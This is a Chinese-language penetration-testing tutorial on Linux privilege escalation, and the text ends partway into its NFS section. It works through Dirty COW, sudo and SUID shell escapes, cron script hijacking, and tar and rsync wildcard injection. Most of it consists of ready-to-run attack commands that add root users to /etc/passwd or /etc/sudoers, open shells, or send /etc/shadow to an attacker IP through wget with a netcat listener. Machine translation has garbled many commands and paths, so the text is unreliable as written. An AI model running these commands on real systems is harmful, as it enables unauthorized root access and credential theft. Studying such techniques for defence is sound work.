內(nèi)核，操作系統(tǒng)，所有應(yīng)用程序，其插件和Web服務(wù)

0x003 linux提權(quán)—自動信息收集

枚舉腳本

我主要使用了三個用于枚舉機(jī)器的腳本。它們在腳本之間有些區(qū)別，但是它們輸出的內(nèi)容很多相同。因此，將它們?nèi)繙y試一下，看看您最喜歡哪一個。

LinEnum

https://github.com/rebootuser/LinEnum

以下是選項：

?

-k Enter keyword
-e Enter export location
-t Include thorough (lengthy) tests
-r Enter report name
-h Displays this help text

?

Unix特權(quán)

http://pentestmonkey.net/tools/audit/unix-privesc-check
運(yùn)行腳本并將輸出保存在文件中，然后使用grep發(fā)出警告。

Linprivchecker.py

https://github.com/reider-roque/linpostexp/blob/master/linprivchecker.py

0x004 linux提權(quán)-內(nèi)核漏洞提權(quán)

通過利用Linux內(nèi)核中的漏洞，有時我們可以提升特權(quán)。我們通常需要了解的操作系統(tǒng)，體系結(jié)構(gòu)和內(nèi)核版本是測試內(nèi)核利用是否可行的測試方法。

內(nèi)核漏洞

內(nèi)核漏洞利用程序是利用內(nèi)核漏洞來執(zhí)行具有更高權(quán)限的任意代碼的程序。成功的內(nèi)核利用通常以root命令提示符的形式為攻擊者提供對目標(biāo)系統(tǒng)的超級用戶訪問權(quán)限。在許多情況下，升級到Linux系統(tǒng)上的根目錄就像將內(nèi)核漏洞利用程序下載到目標(biāo)文件系統(tǒng)，編譯該漏洞利用程序然后執(zhí)行它一樣簡單。

假設(shè)我們可以以非特權(quán)用戶身份運(yùn)行代碼，這就是內(nèi)核利用的通用工作流程。

1.誘使內(nèi)核在內(nèi)核模式下運(yùn)行我們的有效負(fù)載

2.處理內(nèi)核數(shù)據(jù)，例如進(jìn)程特權(quán)3.以新特權(quán)啟動shell root！

考慮到要成功利用內(nèi)核利用攻擊，攻擊者需要滿足以下四個條件：

1.易受攻擊的內(nèi)核

2.匹配的漏洞利用程序

3.將漏洞利用程序轉(zhuǎn)移到目標(biāo)上的能力

4.在目標(biāo)上執(zhí)行漏洞利用程序的能力

抵御內(nèi)核漏洞的最簡單方法是保持內(nèi)核的修補(bǔ)和更新。在沒有補(bǔ)丁的情況下，管理員可以極大地影響在目標(biāo)上轉(zhuǎn)移和執(zhí)行漏洞利用的能力。考慮到這些因素，如果管理員可以阻止將利用程序引入和/或執(zhí)行到Linux文件系統(tǒng)上，則內(nèi)核利用程序攻擊將不再可行。因此，管理員應(yīng)專注于限制或刪除支持文件傳輸?shù)某绦?，例如FTP，TFTP，SCP，wget和curl。當(dāng)需要這些程序時，它們的使用應(yīng)限于特定的用戶，目錄，應(yīng)用程序（例如SCP）和特定的IP地址或域。

內(nèi)核信息收集

一些基本命令收集一些Linux內(nèi)核信息

搜索漏洞

site:exploit-db.com kernel version python linprivchecker.py extended

通過臟牛（**CVE-2016-5195**）利用易受攻擊的機(jī)器
$ whoami命令–告訴我們當(dāng)前用戶是john（非root用戶）
$ uname -a –給我們我們知道容易受到dirtycow攻擊的內(nèi)核版本>從此處下載dirtycow漏洞– https：//www.exploit-db .com / exploits / 40839 />編譯并執(zhí)行。通過編輯/ etc / passwd文件，它將“ root”用戶替換為新用戶“ rash”。
$ su rash –將當(dāng)前登錄用戶更改為root用戶的“ rash”。

其他內(nèi)核提權(quán)

https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs

對于不同的內(nèi)核和操作系統(tǒng)，可以公開獲得許多不同的本地特權(quán)升級漏洞。是否可以使用內(nèi)核利用漏洞在Linux主機(jī)上獲得root訪問權(quán)限，取決于內(nèi)核是否易受攻擊。Kali Linux具有exploit-db漏洞的本地副本，這使搜索本地根漏洞更加容易。我不建議在搜索Linux內(nèi)核漏洞時完全依賴此數(shù)據(jù)庫。

避免一開始就利用任何本地特權(quán)升級漏洞

如果可以避免，請不要使用內(nèi)核漏洞利用。如果使用它，可能會使計算機(jī)崩潰或使其處于不穩(wěn)定狀態(tài)。因此，內(nèi)核漏洞利用應(yīng)該是最后的手段。

0x004 linux提權(quán)-利用以root權(quán)限運(yùn)行的服務(wù)

描述

著名的EternalBlue和SambaCry漏洞利用了以root身份運(yùn)行的smb服務(wù)。由于它的致命組合，它被廣泛用于在全球范圍內(nèi)傳播勒索軟件。

這里的手法是，如果特定服務(wù)以root用戶身份運(yùn)行，并且我們可以使該服務(wù)執(zhí)行命令，則可以root用戶身份執(zhí)行命令。

我們可以重點(diǎn)檢查Web服務(wù)，郵件服務(wù)，數(shù)據(jù)庫服務(wù)等是否以root用戶身份運(yùn)行。很多時候，運(yùn)維都以root用戶身份運(yùn)行這些服務(wù)，而忽略了它可能引起的安全問題?？赡苡幸恍┓?wù)在本地運(yùn)行，而沒有公開暴露出來，但是也可以利用。

netstat -antup 顯示所有打開并正在監(jiān)聽的端口。我們可以檢查在本地運(yùn)行的服務(wù)是否可以被利用。

ps aux 列出哪些進(jìn)程正在運(yùn)行

ps -aux | grep root 列出以root身份運(yùn)行的服務(wù)。

在Matesploits中

ps ?檢查哪些進(jìn)程正在運(yùn)行

利用以root用戶身份運(yùn)行的易受攻擊的MySQL版本來獲得root用戶訪問權(quán)限

MySQL UDF動態(tài)庫漏洞利用可讓我們從mysql shell執(zhí)行任意命令。如果mysql以root特權(quán)運(yùn)行，則命令將以root身份執(zhí)行。

ps -aux | grep root 列出以root身份運(yùn)行的服務(wù)。

可以看到mysql服務(wù)以root用戶組運(yùn)行，那么我們可以使用將作為root用戶執(zhí)行的MySQL Shell執(zhí)行任意命令。

擁有root權(quán)限的程序的二進(jìn)制漏洞利用遠(yuǎn)沒有內(nèi)核漏洞利用危險，因為即使服務(wù)崩潰，主機(jī)也不會崩潰，并且服務(wù)可能會自動重啟。

防御

除非真正需要，否則切勿以root用戶身份運(yùn)行任何服務(wù)，尤其是Web，數(shù)據(jù)庫和文件服務(wù)器。

0x005 linux提權(quán)—濫用SUDO

在滲透中，我們拿到的webshell和反彈回來的shell權(quán)限可能都不高，如果我們可以使用sudo命令訪問某些程序，則我們可以使用sudo可以升級特權(quán)。在這里，我顯示了一些二進(jìn)制文件，這些文件可以幫助您使用sudo命令提升特權(quán)。但是在特權(quán)升級之前，讓我們了解一些sudoer文件語法，sudo命令是什么？;）。

什么是SUDO？

Sudoer文件語法。

利用SUDO用戶

/usr/bin/find

/usr/bin/nano

/usr/bin/vim

/usr/bin/man

/usr/bin/awk

/usr/bin/less

/usr/bin/nmap ( –interactive and –script method)

/bin/more

/usr/bin/wget

/usr/sbin/apache2

什么是SUDO ??

sudo是linux系統(tǒng)管理指令，是允許系統(tǒng)管理員讓普通用戶執(zhí)行一些或者全部的root命令的一個工具，如halt，reboot，su等等。這樣不僅減少了root用戶的登錄 和管理時間，同樣也提高了安全性。sudo不是對shell的一個代替，它是面向每個命令的。

基礎(chǔ)

它的特性主要有這樣幾點(diǎn)：

sudo能夠限制用戶只在某臺主機(jī)上運(yùn)行某些命令。

sudo提供了豐富的日志，詳細(xì)地記錄了每個用戶干了什么。它能夠?qū)⑷罩緜鞯?a target="_blank">中心主機(jī)或者日志服務(wù)器。

sudo使用時間戳文件來執(zhí)行類似的“檢票”系統(tǒng)。當(dāng)用戶調(diào)用sudo并且輸入它的密碼時，用戶獲得了一張存活期為5分鐘的票（這個值可以在編譯的時候改變）。

sudo的配置文件是sudoers文件，它允許系統(tǒng)管理員集中的管理用戶的使用權(quán)限和使用的主機(jī)。它所存放的位置默認(rèn)是在/etc/sudoers，屬性必須為0440。

在sudo于1980年前后被寫出之前，一般用戶管理系統(tǒng)的方式是利用su切換為超級用戶。但是使用su的缺點(diǎn)之一在于必須要先告知超級用戶的密碼。

sudo使一般用戶不需要知道超級用戶的密碼即可獲得權(quán)限。首先超級用戶將普通用戶的名字、可以執(zhí)行的特定命令、按照哪種用戶或用戶組的身份執(zhí)行等信息，登記在特殊的文件中（通常是/etc/sudoers），即完成對該用戶的授權(quán)（此時該用戶稱為“sudoer”）；在一般用戶需要取得特殊權(quán)限時，其可在命令前加上“sudo”，此時sudo將會詢問該用戶自己的密碼（以確認(rèn)終端機(jī)前的是該用戶本人），回答后系統(tǒng)即會將該命令的進(jìn)程以超級用戶的權(quán)限運(yùn)行。之后的一段時間內(nèi)（默認(rèn)為5分鐘，可在/etc/sudoers自定義），使用sudo不需要再次輸入密碼。

由于不需要超級用戶的密碼，部分Unix系統(tǒng)甚至利用sudo使一般用戶取代超級用戶作為管理帳號，例如Ubuntu、Mac OS X等。

參數(shù)說明：

-V 顯示版本編號

-h 會顯示版本編號及指令的使用方式說明

-l 顯示出自己（執(zhí)行 sudo 的使用者）的權(quán)限

-v 因為 sudo 在第一次執(zhí)行時或是在 N 分鐘內(nèi)沒有執(zhí)行（N 預(yù)設(shè)為五）會問密碼，這個參數(shù)是重新做一次確認(rèn)，如果超過 N 分鐘，也會問密碼

-k 將會強(qiáng)迫使用者在下一次執(zhí)行 sudo 時問密碼（不論有沒有超過 N 分鐘）

-b 將要執(zhí)行的指令放在背景執(zhí)行

-p prompt 可以更改問密碼的提示語，其中 %u 會代換為使用者的帳號名稱， %h 會顯示主機(jī)名稱

-u username/#uid 不加此參數(shù)，代表要以 root 的身份執(zhí)行指令，而加了此參數(shù)，可以以 username 的身份執(zhí)行指令（#uid 為該 username 的使用者號碼）

-s 執(zhí)行環(huán)境變數(shù)中的 SHELL 所指定的 shell ，或是 /etc/passwd 里所指定的 shell

-H 將環(huán)境變數(shù)中的 HOME （家目錄）指定為要變更身份的使用者家目錄（如不加 -u 參數(shù)就是系統(tǒng)管理者 root ）

command 要以系統(tǒng)管理者身份（或以 -u 更改為其他人）執(zhí)行的指令

Sudoer文件

sudoers文件主要有三部分組成：

sudoers的默認(rèn)配置（default），主要設(shè)置sudo的一些缺省值

alias（別名），主要有Host_Alias|Runas_Alias|User_Alias|Cmnd_Alias。

安全策略（規(guī)則定義）——重點(diǎn)。

語法

root ALL=(ALL) ALL

說明1：root用戶可以從 ?ALL終端作為 ?ALL（任意）用戶執(zhí)行，并運(yùn)行 ?ALL（任意）命令。

第一部分是用戶，第二部分是用戶可以在其中使用sudo命令的終端，第三部分是他可以充當(dāng)?shù)挠脩簦詈笠徊糠质撬谑褂脮r可以運(yùn)行的命令。sudo

touhid ALL= /sbin/poweroff

說明2：以上命令，使用戶可以從任何終端使用touhid**的用戶密碼**關(guān)閉命令電源。

touhid ALL = (root) NOPASSWD: /usr/bin/find

說明3：上面的命令，使用戶可以從任何終端運(yùn)行，以root用戶身份運(yùn)行命令find?而無需密碼。

利用SUDO用戶

要利用sudo用戶，您需要找到您必須允許的命令。
sudo -l

上面的命令顯示了允許當(dāng)前用戶使用的命令。

此處sudo -l，顯示用戶已允許以root用戶身份執(zhí)行所有此二進(jìn)制文件而無需密碼。

讓我們一一查看所有二進(jìn)制文件（僅在索引中提到）和將特權(quán)提升給root用戶。

使用查找命令

sudo find / etc / passwd -exec / bin / sh ;

要么

sudo find / bin -name nano -exec / bin / sh ;

使用Vim命令

sudo vim -c’！sh’

使用Nmap命令

sudo nmap-交互式nmap>！shsh-4.1＃

注意：**nmap –interactive選項在最新的nmap**中不可用。

沒有互動的最新方式

echo“ os.execute（’/ bin / sh’）”> /tmp/shell.nse && sudo nmap —script = / tmp / shell.nse

使用Man命令

sudo man man

之后按！按下并按Enter

使用less/more命令

sudo less / etc / hosts

sudo more / etc / hosts

之后按！按下并按Enter

使用awk命令

sudo awk’BEGIN {system（“ / bin / sh”）}’

使用nano命令

nano是使用此編輯器的文本編輯器，在您需要切換用戶之后，您可以修改passwd文件并將用戶添加為root特權(quán)。在/ etc /passwd中添加此行，以將用戶添加為root特權(quán)。

touhid：$ 6 $ bxwJfzor $ MUhUWO0MUgdkWfPPEydqgZpm.YtPMI / gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0：0：0：root：/ root：/ bin

sudo nano / etc / passwd

現(xiàn)在切換用戶密碼是：test

su touhid

使用wget命令

這種非常酷的方式要求Web服務(wù)器下載文件。這樣我從沒在任何地方見過。讓我們解釋一下。

首先將Target的/ etc / passwd文件復(fù)制到攻擊者計算機(jī)。

修改文件，并在上一步中保存的密碼文件中添加用戶到攻擊者計算機(jī)。

僅附加此行=> ??touhid**：$ 6 $ bxwJfzor $ MUhUWO0MUgdkWfPPEydqgZpm.YtPMI / gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0 / 0：b：root / root：**

將passwd文件托管到使用任何Web服務(wù)器的主機(jī)。

在受害者方面。

sudo wget http://192.168.56.1:8080/passwd -O / etc / passwd

現(xiàn)在切換用戶密碼是：test

su touhid

注意：如果您要從服務(wù)器上轉(zhuǎn)儲文件，例如root的ssh密鑰，shadow文件等。

sudo wget —post-file = / etc / shadow 192.168.56.1:8080

攻擊者的設(shè)置偵聽器：nc –lvp 8080

使用apache命令

但是，我們無法獲得Shell和Cant編輯系統(tǒng)文件。

但是使用它我們可以查看系統(tǒng)文件。

sudo apache2 -f / etc / shadow

輸出是這樣的：

Syntax error on line 1 of /etc/shadow:Invalid command 'root:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX007:::', perhaps misspelled or defined by a module not included in the server configuration

可悲的是沒有shell。但是我們可以現(xiàn)在提取root哈希，然后在破解了哈希。

0x006 linux提權(quán)-Suid和Guid配置錯誤

描述

SUID代表設(shè)置的用戶ID，是一種Linux功能，允許用戶在指定用戶的許可下執(zhí)行文件。例如，Linux ping命令通常需要root權(quán)限才能打開網(wǎng)絡(luò)套接字。通過將ping程序標(biāo)記為SUID（所有者為root），只要低特權(quán)用戶執(zhí)行ping程序，便會以root特權(quán)執(zhí)行ping。

SUID（設(shè)置用戶ID）是賦予文件的一種權(quán)限，它會出現(xiàn)在文件擁有者權(quán)限的執(zhí)行位上，具有這種權(quán)限的文件會在其執(zhí)行時，使調(diào)用者暫時獲得該文件擁有者的權(quán)限。

當(dāng)運(yùn)行具有suid權(quán)限的二進(jìn)制文件時，它將以其他用戶身份運(yùn)行，因此具有其他用戶特權(quán)。它可以是root用戶，也可以只是另一個用戶。如果在程序中設(shè)置了suid，該位可以生成shell或以其他方式濫用，我們可以使用它來提升我們的特權(quán)。

以下是一些可用于產(chǎn)生SHELL的程序：

nmap

vim

less more

nano

cpmv

find

查找suid和guid文件

Find SUID find / -perm -u=s -type f 2>/dev/null Find GUID find / -perm -g=s -type f 2>/dev/null

其他命令

也可以使用 sudo -l 命令列出當(dāng)前用戶可執(zhí)行的命令

常用提權(quán)方式

nmap

find / -perm -u = s -type f 2> / dev / null –查找設(shè)置了SUID位的可執(zhí)行文件

ls -la / usr / local / bin / nmap –讓我們確認(rèn)nmap是否設(shè)置了SUID位。

Nmap的SUID位置1。很多時候，管理員將SUID位設(shè)置為nmap，以便可以有效地掃描網(wǎng)絡(luò)，因為如果不使用root特權(quán)運(yùn)行它，則所有的nmap掃描技術(shù)都將無法使用。

但是，nmap（2.02-5.21）存在交換模式，可利用提權(quán)，我們可以在此模式下以交互方式運(yùn)行nmap，從而可以轉(zhuǎn)至shell。如果nmap設(shè)置了SUID位，它將以root特權(quán)運(yùn)行，我們可以通過其交互模式訪問’root’shell。

nmap –interactive –運(yùn)行nmap交互模式！sh –我們可以從nmap shell轉(zhuǎn)到系統(tǒng)shell

msf中的模塊為：

exploit/unix/local/setuid_nmap

較新版可使用 —script 參數(shù)：

echo “os.execute(‘/bin/sh’)” > /tmp/shell.nse && sudo nmap —script=/tmp/shell.nse

find

touch test

nc?反彈 shell：

find test -exec netcat -lvp 5555 -e /bin/sh ;

vi/vim

Vim的主要用途是用作文本編輯器。但是，如果以SUID運(yùn)行，它將繼承root用戶的權(quán)限，因此可以讀取系統(tǒng)上的所有文件。

打開vim,按下ESC

:set shell=/bin/sh:shell

或者

sudo vim -c ‘!sh’

bash

以下命令將以root身份打開一個bash shell。

bash -pbash-3.2# iduid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)

less

程序Less也可以執(zhí)行提權(quán)后的shell。同樣的方法也適用于其他許多命令。

less /etc/passwd!/bin/sh

more

more /home/pelle/myfile!/bin/bash

cp

覆蓋 /etc/shadow 或 /etc/passwd

?

[zabbix@localhost ~]$ cat /etc/passwd >passwd[zabbix@localhost ~]$ openssl passwd -1 -salt hack hack123$1$hack$WTn0dk2QjNeKfl.DHOUue0[zabbix@localhost ~]$ echo 'hack:$1$hack$WTn0dk2QjNeKfl.DHOUue00::/root/:/bin/bash' >> passwd[zabbix@localhost ~]$ cp passwd /etc/passwd[zabbix@localhost ~]$ su - hackPassword:[root@361way ~]# iduid=0(hack) gid=0(root) groups=0(root)[root@361way ~]# cat /etc/passwd|tail -1hack:$1$hack$WTn0dk2QjNeKfl.DHOUue00::/root/:/bin/bash

?

mv

覆蓋 /etc/shadow 或 /etc/passwd

?

[zabbix@localhost ~]$ cat /etc/passwd >passwd[zabbix@localhost ~]$ openssl passwd -1 -salt hack hack123$1$hack$WTn0dk2QjNeKfl.DHOUue0[zabbix@localhost ~]$ echo 'hack:$1$hack$WTn0dk2QjNeKfl.DHOUue00::/root/:/bin/bash' >> passwd[zabbix@localhost ~]$ mv passwd /etc/passwd[zabbix@localhost ~]$ su - hackPassword:[root@361way ~]# iduid=0(hack) gid=0(root) groups=0(root)[root@361way ~]# cat /etc/passwd|tail -1hack:$1$hack$WTn0dk2QjNeKfl.DHOUue00::/root/:/bin/bash

?

nano

nano ?/etc/passwd

awk

awk ‘BEGIN {system(“/bin/sh”)}’

man

man passwd!/bin/bash

wget

wget http://192.168.56.1:8080/passwd -O /etc/passwd

apache

僅可查看文件，不能彈 shell：

apache2 -f /etc/shadow

tcpdump

echo $’id cat /etc/shadow’ > /tmp/.testchmod +x /tmp/.testsudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

python/perl/ruby/lua/php/etc

python

python -c “import os;os.system(‘/bin/bash’)”

perl

exec “/bin/bash”;

0x007 linux提權(quán)—利用定時任務(wù)（Cron jobs）

如果未正確配置Cronjob，則可以利用該Cronjob獲得root特權(quán)。

1. Cronjob中是否有可寫的腳本或二進(jìn)制文件？
2.我們可以覆蓋cron文件本身嗎？
3. cron.d目錄可寫嗎？

Cronjob通常以root特權(quán)運(yùn)行。如果我們可以成功篡改cronjob中定義的任何腳本或二進(jìn)制文件，那么我們可以以root特權(quán)執(zhí)行任意代碼。

什么是Cronjob？

Cron Jobs被用于通過在服務(wù)器上的特定日期和時間執(zhí)行命令來安排任務(wù)。它們最常用于sysadmin任務(wù)，如備份或清理/tmp/目錄等。Cron這個詞來自crontab，它存在于/etc目錄中。

例如：在crontab內(nèi)部，我們可以添加以下條目，以每1小時自動打印一次apache錯誤日志。

前五個數(shù)字值表示執(zhí)行cronjob的時間?，F(xiàn)在讓我們了解五個數(shù)字值。

分鐘–第一個值表示介于0到59之間的分鐘范圍，而*表示任何分鐘。

小時–第二個值表示小時范圍在0到24之間，*表示任何小時。

月中的某天–第三個值表示月中的某日，范圍是1到31，*表示任何一天。

月–第四個值表示1到12之間的月份范圍，*表示任何月份。

星期幾–第五個值表示從星期天開始的星期幾，介于0到6之間，*表示星期幾。

簡而言之呢，crontab就是一個自定義定時器。

Cron特權(quán)升級概述

cron守護(hù)程序計劃在指定的日期和時間運(yùn)行命令。它與特定用戶一起運(yùn)行命令。因此，我們可以嘗試濫用它來實現(xiàn)特權(quán)升級。

濫用cron的一個好方法是，

1.檢查cron運(yùn)行的腳本的文件權(quán)限。如果權(quán)限設(shè)置不正確，則攻擊者可能會覆蓋文件并輕松獲取cron中設(shè)置的用戶權(quán)限。

2.另一種方法是使用通配符技巧

Cron**信息收集**

一些基本命令收集一些線索，以使用錯誤配置的cron實現(xiàn)特權(quán)升級。

具有特權(quán)的運(yùn)行腳本，其他用戶可以編輯該腳本。

查找特權(quán)用戶擁有但可寫的任何內(nèi)容：

crontab -lls -alh /var/spool/cronls -al /etc/ | grep cronls -al /etc/croncat /etc/croncat /etc/at.allowcat /etc/at.denycat /etc/cron.allowcat /etc/cron.denycat /etc/crontabcat /etc/anacrontabcat /var/spool/cron/crontabs/root

查看其他用戶的crontab

$ crontab -u tstark -l0 0 ?/ jarvis / reboot-arc-reactor

如果服務(wù)器上有很多用戶，那么可以在cron日志中看到詳細(xì)信息，可能包含用戶名。

例如，在這里我可以看到運(yùn)行數(shù)據(jù)庫備份腳本的ubuntu用戶：

8月5日401 dev01 CRON [2128]：（ubuntu）CMD（/var/cronitor/database-backup.sh）

使用pspy工具（32位為pspy32，64位為pspy64）。

下載鏈接：https://github.com/DominicBreuker/pspy

利用配置錯誤的cronjob獲得root訪問權(quán)限

$ ls -la /etc/cron.d –輸出cron.d中已經(jīng)存在的cronjob

find / -perm -2 -type f 2> / dev / null –輸出可寫文件

ls -la /usr/local/sbin/cron-logrotate.sh –讓我們確認(rèn)cron-logrotate.sh是否可寫。

我們知道cron-lograte.sh是可寫的，它由logrotate cronjob運(yùn)行。

那么我們在cron-lograte.sh中編寫/附加的任何命令都將以“ root”身份執(zhí)行。

我們在/ tmp目錄中編寫一個C文件并進(jìn)行編譯。

rootme可執(zhí)行文件將生成一個shell。

?

$ ls -la rootme –它告訴我們它是由用戶'SHayslett'擁有的


$ echo“ chown root：root / tmp / rootme; chmod u + s /tmp/rootme;”>/usr/local/sbin/cron-logrotate.sh –這將更改可執(zhí)行文件的所有者和組為root。它還將設(shè)置SUID位。$ ls -la rootme – 5分鐘后，運(yùn)行了logrotate cronjob，并以root特權(quán)執(zhí)行了cron-logrotate.sh。$ ./rootme –生成一個root shell。

?

Cron腳本覆蓋和符號鏈接

如果可以修改由root執(zhí)行的cron腳本，則可以非常輕松地獲取shell：

echo ‘cp /bin/bash /tmp/bash; chmod +s /tmp/bash’ > #Wait until it is executed/tmp/bash -p＃等待執(zhí)行

/ tmp / bash -p

如果root用戶執(zhí)行的腳本使用具有完全訪問權(quán)限的目錄，則刪除該文件夾并創(chuàng)建一個符號鏈接文件夾到另一個服務(wù)于您控制的腳本的文件夾可能會很有用。

ln -d -s < / PATH / TO / POINT > < / PATH / CREATE / FOLDER >

定時任務(wù)

可以監(jiān)視進(jìn)程以搜索每1,2或5分鐘執(zhí)行的進(jìn)程。可以利用它并提升特權(quán)。

例如，要在1分鐘內(nèi)每隔0.1s監(jiān)視一次，按執(zhí)行次數(shù)較少的命令排序并刪除一直執(zhí)行的命令，可以執(zhí)行以下操作：

for i in $(seq 1 610); do ps -e —format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v “[“ | sed ‘/^.{200}./d’ | sort | grep -E -v “s[6-9][0-9][0-9]|s[0-9][0-9][0-9][0-9]”; rm /tmp/monprocs.tmp;

總結(jié)

由于Cron在執(zhí)行時以root身份運(yùn)行/etc/crontab，因此crontab調(diào)用的任何命令或腳本也將以root身份運(yùn)行。當(dāng)Cron執(zhí)行的腳本可由非特權(quán)用戶編輯時，那些非特權(quán)用戶可以通過編輯此腳本并等待Cron以root特權(quán)執(zhí)行該腳本來提升其特權(quán)！

例如，假設(shè)下面的行在中/etc/crontab。每天晚上9：30，Cron運(yùn)行maintenance.shshell腳本。該腳本在root特權(quán)下運(yùn)行。

30 21?* root /path/to/maintenance.sh

現(xiàn)在讓我們說該maintenance.sh腳本還可以由所有人編輯，而不僅僅是root用戶。在這種情況下，任何人都可以將命令添加到maintenance.sh，并使該命令由root用戶執(zhí)行！

這使得特權(quán)升級變得微不足道。例如，攻擊者可以通過將自己添加為Sudoer來向自己授予超級用戶特權(quán)。

echo “vickie ALL=(ALL) NOPASSWD:ALL” >> /etc/sudoers

或者，他們可以通過將新的root用戶添加到“ / etc / passwd”文件來獲得root訪問權(quán)限。由于“ 0”是root用戶的UID，因此添加UID為“ 0”的用戶將為該用戶提供root特權(quán)。該用戶的用戶名為“ vickie”，密碼為空：

echo “vickie:0:System Administrator:/root/root:/bin/bash” >> /etc/passwd

等等。

0x008 linux提權(quán)-通配符注入

通配符是代表其他字符的符號。您可以將它們與任何命令（例如cat或rm命令）一起使用，以列出或刪除符合給定條件的文件。還有其他一些，但是現(xiàn)在對我們很重要的一個是*字符，它可以匹配任意數(shù)量的字符。

例如：

cat 顯示當(dāng)前目錄中所有文件的內(nèi)容

rm 刪除當(dāng)前目錄中的所有文件

它的工作原理是將角色擴(kuò)展到所有匹配的文件。如果我們有文件a，b并且c在當(dāng)前目錄中并運(yùn)行rm ，則結(jié)果為rm a b c。

原理

眾所周知，我們可以在命令行中將標(biāo)志傳遞給程序以指示其應(yīng)如何運(yùn)行。例如，如果我們使用rm -rf而不是，rm那么它將遞歸并強(qiáng)制刪除文件，而無需進(jìn)一步提示。

現(xiàn)在，如果我們運(yùn)行rm?并在當(dāng)前目錄中有一個名為name的文件，將會發(fā)生什么-rf？的Shell擴(kuò)展將導(dǎo)致命令變?yōu)椋瑀m -rf a b c并且-rf將被解釋為命令參數(shù)。

當(dāng)特權(quán)用戶或腳本在具有潛在危險標(biāo)志的命令中使用通配符時，尤其是與外部命令執(zhí)行相關(guān)的通配符，這是一個壞消息。在這些情況下，我們可能會使用它來升級特權(quán)。

chown和chmod

chown和chmod都可以用相同的方式利用，因此我只看看chown。

Chown是一個程序，可讓您更改指定文件的所有者。以下示例將some-file.txt的所有者更改為some-user：

chown some-user some-file.txt

Chown具有一個—reference=some-reference-file標(biāo)志，該標(biāo)志指定文件的所有者應(yīng)與參考文件的所有者相同。一個例子應(yīng)該有幫助：

chown some-user some-file.txt —reference=some-reference-file

假設(shè)的所有者some-reference-file是another-user。在這種情況下，所有者some-file.txt將another-user代替some-user。

利用

假設(shè)我們有一個名為弱勢程序的脆弱程序，其中包含以下內(nèi)容：

cd some-directorychown root *

在這種情況下，讓我們創(chuàng)建一個我們擁有的文件：

cd some-directory touch reference

然后我們創(chuàng)建一個文件，將注入標(biāo)記：

touch — —reference=reference

如果在同一目錄中創(chuàng)建到/ etc / passwd的符號鏈接，則/ etc / passwd的所有者也將是您，這將使您獲得root shell。

其他

TAR

Tar是一個程序，可讓您將文件收集到存檔中。

在tar中，有“檢查點(diǎn)”標(biāo)志，這些標(biāo)志使您可以在歸檔指定數(shù)量的文件后執(zhí)行操作。由于我們可以使用通配符注入來注入那些標(biāo)志，因此我們可以使用檢查點(diǎn)來執(zhí)行我們選擇的命令。如果tar以root用戶身份運(yùn)行，則命令也將以root用戶身份運(yùn)行。

鑒于存在此漏洞，獲得root用戶特權(quán)的一種簡單方法是使自己成為sudoer。sudoer是可以承擔(dān)root特權(quán)的用戶。這些用戶在/etc/sudoers文件中指定。只需在該文件上追加一行，我們就可以使自己變得更輕松。

利用

假設(shè)我們有一個易受攻擊的程序，并且使用cron定期運(yùn)行該程序。該程序包含以下內(nèi)容：

cd important-directorytar cf /var/backups/backup.tar *

進(jìn)行根訪問的步驟如下：

1）注入一個標(biāo)志來指定我們的檢查點(diǎn)

首先，我們將指定在歸檔一個文件之后，有一個檢查點(diǎn)。稍后我們將對該檢查點(diǎn)執(zhí)行操作，但是現(xiàn)在我們僅告訴tar它存在。

讓我們創(chuàng)建一個將注入標(biāo)記的文件：

cd important-directorytouch — —checkpoint=1

2）編寫惡意的Shell腳本

Shell腳本將/etc/sudoers在其后追加代碼，這會使您變得更加無禮。

您需要添加到的行/etc/sudoers是my-user ALL=(root) NOPASSWD: ALL。

讓我們創(chuàng)建shell腳本：

echo ‘echo “my-user ALL=(root) NOPASSWD: ALL” >> /etc/sudoers’ > demo.sh

Shell腳本應(yīng)與通配符位于同一目錄中。

請注意，我們將必須更改my-user為要成為sudoer的實際用戶。

3）注入一個指定檢查點(diǎn)動作的標(biāo)志

現(xiàn)在，我們將指定，當(dāng)tar到達(dá)在步驟＃1中指定的檢查點(diǎn)時，它應(yīng)運(yùn)行在步驟＃2中創(chuàng)建的shell腳本：

touch — “—checkpoint-action=exec=sh demo.sh”

4）root

等待，直到cron執(zhí)行了腳本并通過鍵入以下內(nèi)容獲得root特權(quán)：

sudo su

rsync

Rsync是“快速，通用，遠(yuǎn)程（和本地）文件復(fù)制工具”，在linux系統(tǒng)上非常常見。

與rsync一起使用的一些有趣的標(biāo)志是：

-e, —rsh=COMMAND ? ? ? ? ? specify the remote shell to use ? ? —rsync-path=PROGRAM ? ?specify the rsync to run on remote machine

我們可以使用該-e標(biāo)志來運(yùn)行所需的任何Shell腳本。讓我們創(chuàng)建一個shell腳本，它將我們添加到sudoers文件中：

echo ‘echo “my-user ALL=(root) NOPASSWD: ALL” >> /etc/sudoers’ > shell.sh

現(xiàn)在讓我們注入將運(yùn)行我們的shell腳本的標(biāo)志：

touch — “-e sh shell.sh”

0x009 Linux提權(quán)-NFS權(quán)限弱

如果您在linu服務(wù)器上具有低特權(quán)shell，并且發(fā)現(xiàn)服務(wù)器中具有NFS共享，則可以使用它來升級特權(quán)。但是成功取決于它的配置方式。

目錄

什么是NFS？

什么是root_sqaush和no_root_sqaush？

所需的工具和程序文件。

利用NFS弱權(quán)限。

什么是NFS？

網(wǎng)絡(luò)文件系統(tǒng)（NFS）是一個客戶端/服務(wù)器應(yīng)用程序，它使計算機(jī)用戶可以查看和選擇存儲和更新遠(yuǎn)程計算機(jī)上的文件，就像它們位于用戶自己的計算機(jī)上一樣。在NFS協(xié)議是幾個分布式文件系統(tǒng)標(biāo)準(zhǔn)，網(wǎng)絡(luò)附加存儲（NAS）之一。

